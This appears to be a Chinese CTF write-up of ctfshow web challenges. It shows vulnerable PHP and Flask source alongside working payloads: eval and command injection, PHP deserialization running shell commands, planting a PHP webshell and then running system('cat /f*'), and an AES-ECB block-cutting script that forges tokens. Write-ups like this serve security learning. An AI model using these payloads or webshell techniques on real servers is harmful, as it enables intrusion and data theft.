web签到题

error_reporting(0);
highlight_file(__FILE__);eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

套娃传参
中文要编码

Cookies ：CTFshow-QQ%E7%BE%A4:=a
POST:a=b
GET:?b=c&c[6][0][7][5][8][0][9][4][4]=system('cat /flag');

web2 c0me_t0_s1gn

查看源代码发现一半的flag
控制台提示
到手

我的眼里只有$

error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
eval中的变量嵌套我们需要一直赋值，36次

import string
s = string.ascii_letters 
t='_=a&'
code="phpinfo();"
for i in range(35):t+=s[i]+"="+s[i+1]+'&'t+=s[i]+'='+code
print(t)

自己修改命令就能获得flag了

POST：
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=J&I=system('cat /f*');

web抽老婆

明天做

一言既出

num=114514);// 
直接把后面的注释掉
num=114514);(1919810      //括号闭合
num=114514%2b1805296          //利用URL编码 '+' =  '%2b'使得前面绕过后再相加等于1919810绕过

驷马难追

<?php
highlight_file(__FILE__); 
include "flag.php";  
if (isset($_GET['num'])){if ($_GET['num'] == 114514 && check($_GET['num'])){assert("intval($_GET[num])==1919810") or die("一言既出，驷马难追!");echo $flag;} 
} function check($str){return !preg_match("/[a-z]|\;|\(|\)/",$str);
} 

这次有过滤了但是还是能正常操作

num=114514%2b1805296  

TapTapTap

F12发现有一个可疑文件，但是这是真猥琐啊500多行，base64解密

直接访问就行
/secret_path_you_do_not_know/secretfile.txt

Webshell

 <?php error_reporting(0);class Webshell {public $cmd = 'echo "Hello World!"';public function __construct() {$this->init();}public function init() {if (!preg_match('/flag/i', $this->cmd)) {$this->exec($this->cmd);}}public function exec($cmd) {$result = shell_exec($cmd);echo $result;}}if(isset($_GET['cmd'])) {$serializecmd = $_GET['cmd'];$unserializecmd = unserialize($serializecmd);$unserializecmd->init();}else {highlight_file(__FILE__);}?> 

GET方法传入cmd然后进行反序列化，再进行正则匹配，执行命令

shell_exec：执行命令
unserialize：反序列化

序列化

将类型转换为对象，反序列化反之

<?php
class Webshell {public $cmd = 'tac fl*';}
$j17 = new Webshell();
echo serialize($j17);
echo urlencode(serialize($j17));
?>

?cmd=O:8:"Webshell":1:{s:3:"cmd";s:7:"tac%20fl*";}

php反序列化

化零为整

<?phphighlight_file(__FILE__);
include "flag.php";$result='';for ($i=1;$i<=count($_GET);$i++){if (strlen($_GET[$i])>1){die("你太长了！！");}else{$result=$result.$_GET[$i];}
}if ($result ==="大牛"){echo $flag;
}

count函数是数GET的传入参数个数的

直接用URL编码就可以绕过每次传一个

?1=%E5&2=%A4&3=%A7&4=%E7&5=%89&6=%9B

无一幸免

<?php
include "flag.php";
highlight_file(__FILE__);if (isset($_GET['0'])){$arr[$_GET['0']]=1;if ($arr[]=1){die($flag);}else{die("nonono!");}
}

数组等于1直接传

?0=1

传说之下（雾）

F12看js文件发现Game类
控制台传Game.score=3000
再玩一下就行

遍地飘零

<?php
include "flag.php";
highlight_file(__FILE__);$zeros="000000000000000000000000000000";foreach($_GET as $key => $value){$$key=$$value;
}if ($flag=="000000000000000000000000000000"){echo "好多零";
}else{echo "没有零，仔细看看输入有什么问题吧";var_dump($_GET);
}

foreach形成键值对
var_dump打印变量内容

直接传入

?_GET=flag
键为_GET,值为flag,直接就会打印flag

茶歇区

遇事不决抓包我们要刷分，利用整数溢出
只能是e的整数溢出至于为啥我不知道因为其他的溢出回显是
“人要脸树要皮，你怎么拿这么多”

小舔田？

<?php
include "flag.php";
highlight_file(__FILE__);class Moon{public $name="月亮";public function __toString(){return $this->name;}public function __wakeup(){echo "我是".$this->name."快来赏我";}
}class Ion_Fan_Princess{public $nickname="牛夫人";public function call(){global $flag;if ($this->nickname=="小甜甜"){echo $flag;}else{echo "以前陪我看月亮的时候，叫人家小甜甜！现在新人胜旧人，叫人家".$this->nickname."。\n";echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";}}public function __toString(){$this->call();return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;}
}if (isset($_GET['code'])){unserialize($_GET['code']);}else{$a=new Ion_Fan_Princess();echo $a;
}

先传GET，然后反序列化再进入函数使得等于小甜甜就有flag

<?php
class Moon{public $name;
}class Ion_Fan_Princess{public $nickname="小甜甜";}
$a = new Moon();
$b = new Ion_Fan_Princess();
$a->name=$b;
echo serialize($a);

code=O:4:"Moon":1:{s:4:"name";O:16:"Ion_Fan_Princess":1:{s:8:"nickname";s:9:"小甜甜";}}

LSB探姬

#初始化全局变量
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():    return render_template('upload.html')
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():if request.method == 'POST':try:f = request.files['file']f.save('upload/'+f.filename)cmd="python3 tsteg.py upload/"+f.filenameresult=os.popen(cmd).read()data={"code":0,"cmd":cmd,"result":result,"message":"file uploaded!"}return jsonify(data)except:data={"code":1,"message":"file upload error!"}return jsonify(data)else:return render_template('upload.html')
@app.route('/source', methods=['GET'])
def show_source():return render_template('source.html')
if __name__ == '__main__':app.run(host='0.0.0.0',port=80,debug=False)

cmd="python3 tsteg.py upload/"+f.filename
利用py3执行文件名，我们在文件名里面拼接命令即可

Is_Not_Obfuscate

扫描后台
dirb "https://44194809-5de5-4ab4-a3c4-7f5fa8dcc855.challenge.ctf.show/"

访问/lib.php?flag=0发现不对
改成/lib.php?flag=1发现密文

eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI/w3p1+/wX69euqzpVDJ2a/GkWO4z4QQpnTUq9P5fFd3Uu+YvM2ht+ZXSvYiLXq0o8zaUZ/KSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K+WAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr+NHn6Jn3MYCnm/z9GbI9TH0XZfPPoqqZRrKo48Gdz+odPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI+CLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg/EmgnR+x6othXTZ2ZGQsEYvRa/U1LaK/4D7Op3ZKrKFnzAs01qSCbbf+P097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ+DU5vzz0+doHA+3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw+F7BHMJPheaGD3faUo71nCiV6QWQu0VW/O2DvG+eubaq5t1a5Y3tYJmti6soht26kuF7jUUg+vZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9+kQvcSUbuwuEnWHYzn16/ewTo+gVIqv0+DNJC0YUGs9kWnS2+1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ/r2muD0WE4G5qRRQ8dnmkgxTVF7Zh61/yvmis14AVf3UwjoHywgVs7MNevg/tCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY+MB7L5c4S+5arvpFKn/GN4KvCEWYZ+r7inzI+ng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E+fPm6bO7/jSe+2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp/SzwQLyo5N5HVZEVzMdqY7RiEqT6/FOLji7N/7E3c+8ZLOGGQcDJMM5FARuDOfYyh09+M+I1Hdc+bCze4S0TuOa3j7orHPzP/BLQQLKt6c4cLZ42QbgJwmpowDmVjo/R6dyCuJbWwKGS8BVtzxfh2YhYu+r1n7mrY7nPTxszI6w/TWAErJEBVZwXlj33RDqfi+u45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP/9+w8pT7oT

<!-- //测试执行加密后的插件代码 //这里只能执行加密代码，非加密代码不能执行eval(decode($_GET['input'])); -->
<!-- <button name="action" value="test"> 执行 (do)</button>-->

?input=eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI%2Fw3p1%2B%2FwX69euqzpVDJ2a%2FGkWO4z4QQpnTUq9P5fFd3Uu%2BYvM2ht%2BZXSvYiLXq0o8zaUZ%2FKSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K%2BWAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr%2BNHn6Jn3MYCnm%2Fz9GbI9TH0XZfPPoqqZRrKo48Gdz%2BodPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI%2BCLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg%2FEmgnR%2Bx6othXTZ2ZGQsEYvRa%2FU1LaK%2F4D7Op3ZKrKFnzAs01qSCbbf%2BP097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ%2BDU5vzz0%2BdoHA%2B3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw%2BF7BHMJPheaGD3faUo71nCiV6QWQu0VW%2FO2DvG%2Beubaq5t1a5Y3tYJmti6soht26kuF7jUUg%2BvZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9%2BkQvcSUbuwuEnWHYzn16%2FewTo%2BgVIqv0%2BDNJC0YUGs9kWnS2%2B1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ%2Fr2muD0WE4G5qRRQ8dnmkgxTVF7Zh61%2Fyvmis14AVf3UwjoHywgVs7MNevg%2FtCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY%2BMB7L5c4S%2B5arvpFKn%2FGN4KvCEWYZ%2Br7inzI%2Bng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E%2BfPm6bO7%2FjSe%2B2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp%2FSzwQLyo5N5HVZEVzMdqY7RiEqT6%2FFOLji7N%2F7E3c%2B8ZLOGGQcDJMM5FARuDOfYyh09%2BM%2BI1Hdc%2BbCze4S0TuOa3j7orHPzP%2FBLQQLKt6c4cLZ42QbgJwmpowDmVjo%2FR6dyCuJbWwKGS8BVtzxfh2YhYu%2Br1n7mrY7nPTxszI6w%2FTWAErJEBVZwXlj33RDqfi%2Bu45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP%2F9%2Bw8pT7oT&action=test

Anything is good?Please test it. <?php
header("Content-Type:text/html;charset=utf-8");
include 'lib.php';
if(!is_dir('./plugins/')){@mkdir('./plugins/', 0777);
}
//Test it and delete it ！！！
//测试执行加密后的插件代码
if($_GET['action'] === 'test') {echo 'Anything is good?Please test it.';@eval(decode($_GET['input']));
}ini_set('open_basedir', './plugins/');
if(!empty($_GET['action'])){switch ($_GET['action']){case 'pull':$output = @eval(decode(file_get_contents('./plugins/'.$_GET['input'])));echo "pull success";break;case 'push':$input = file_put_contents('./plugins/'.md5($_GET['output'].'youyou'), encode($_GET['output']));echo "push success";break;default:die('hacker!');}
}?> 

有push和pull两种
先push

?action=push&output=<?php eval($_GET[1]);?>

# 导入md5 加密所需模块
import hashlib
# 创建md5 对象
m = hashlib.md5()
# 生成加密串，其中password 是要加密的字符串
m.update("<?php eval($_GET[1]);?>youyou".encode('utf-8'))
# 获取加密串
pw = m.hexdigest()
print(pw)

加密结果
d6e1f0ec8980b49f6061227495a77a44

?action=pull&input=d6e1f0ec8980b49f6061227495a77a44
成功之后加命令
&1=system('ls /');
&1=system('cat /f*');

龙珠NFT

点击开始搜索获得base64

JyhoO0yyT0T55xPULlCbrF1n4l7QipBqiQZXUxm6t/gT1Uc1OSjfXZwIqniz+k2BZ54GXZxmExeDFBVioovwa3G+Vh2aZRF0YaR1fIyEHMqv1y5h+y7jn0vi42/oJnRKWtpP3Oj8IyMqdIB3Am1/RqTyAAmXKNHNvKZrOcLlSBo=

这个是 AES_ECB解密不会解密，MD一个web怎么这么多解密

    项目简介开始搜索查看库存查看源码源代码</># !/usr/bin/env python# -*-coding:utf-8 -*-"""# File       : app.py# Time       ：2022/10/20 15:16# Author     ：g4_simon# version    ：python 3.9.7# Description：DragonBall Radar (BlockChain)"""import hashlibfrom flask import *import osimport jsonimport hashlibfrom Crypto.Cipher import AESimport randomimport timeimport base64#网上找的AES加密代码，加密我又不懂，加就完事儿了class AESCipher():def __init__(self,key):self.key = self.add_16(hashlib.md5(key.encode()).hexdigest()[:16])self.model = AES.MODE_ECBself.aes = AES.new(self.key,self.model)def add_16(self,par):if type(par) == str:par = par.encode()while len(par) % 16 != 0:par += b'\x00'return pardef aesencrypt(self,text):text = self.add_16(text)self.encrypt_text = self.aes.encrypt(text)return self.encrypt_textdef aesdecrypt(self,text):self.decrypt_text = self.aes.decrypt(text)self.decrypt_text = self.decrypt_text.strip(b"\x00")return self.decrypt_text#初始化全局变量app = Flask(__name__)flag=os.getenv('FLAG')AES_ECB=AESCipher(flag)app.config['JSON_AS_ASCII'] = False#懒得弄数据库或者类，直接弄字典就完事儿了players={}@app.route('/', methods=['GET'])def index():"""提供登录功能"""@app.route('/radar',methods=['GET','POST'])def radar():"""提供雷达界面"""@app.route('/find_dragonball',methods=['GET','POST'])def  find_dragonball():"""找龙珠，返回龙珠地址"""xxxxxxxxxxx#无用代码可以忽略if search_count==10:#第一次搜寻，给一个一星龙珠dragonball="1"elif search_count<=0:data={"code":1,"msg":"搜寻次数已用完"}return jsonify(data)else:random_num=random.randint(1,1000)if random_num<=6:dragonball=一个没拿过的球，比如'6'else:dragonball='0'#0就代表没有发现龙珠players[player_id]['search_count']=search_count-1data={'player_id':player_id,'dragonball':dragonball,'round_no':str(11-search_count),'time':time.strftime('%Y-%m-%d %H:%M:%S')}#json.dumps(data)='{"player_id": "572d4e421e5e6b9bc11d815e8a027112", "dragonball": "1", "round_no": "9", "time":"2022-10-19 15:06:45"}'data['address']= base64.b64encode(AES_ECB.aesencrypt(json.dumps(data))).decode()return jsonify(data)@app.route('/get_dragonball',methods=['GET','POST'])def get_dragonball():"""根据龙珠地址解密后添加到用户信息"""xxxxxxxxx#无用代码可以忽略try:player_id=request.cookies.get("player_id")address=request.args.get('address')data=AES_ECB.aesdecrypt(base64.b64decode(address))data=json.loads(data.decode())if data['dragonball'] !="0":players[data['player_id']]['dragonballs'].append(data['dragonball'])return jsonify({'get_ball':data['dragonball']})else:return jsonify({'code':1,'msg':"这个地址没有发现龙珠"})except:return jsonify({'code':1,'msg':"你干啥???????"})@app.route('/flag',methods=['GET','POST'])def get_flag():"""查看龙珠库存"""#如果有7颗龙珠就拿到flag~@app.route('/source',methods=['GET','POST'])def get_source():"""查看源代码"""if __name__ == '__main__':app.run(host='0.0.0.0',port=80,debug=False)

脚本

import requests
import base64
import re
from urllib.parse import *url = 'http://5da1fd16-7436-4635-838a-502be4f68729.challenge.ctf.show/'
sess = requests.Session()sess.get(url+'?username=1')
for i in range(7):url1 = url + 'find_dragonball'r1 = sess.get(url1)a = r1.json()["address"]b = base64.b64decode(a.encode()).hex()c = b[:128]+b[160:]d = quote(base64.b64encode(bytes.fromhex(c)).decode())url2 = url + f'get_dragonball?address={d}'r2 = sess.get(url2)print(r2.text)
r3  = sess.get(url+'flag')
flag = re.findall('ctfshow{.*?}',r3.text)[0]
print(flag)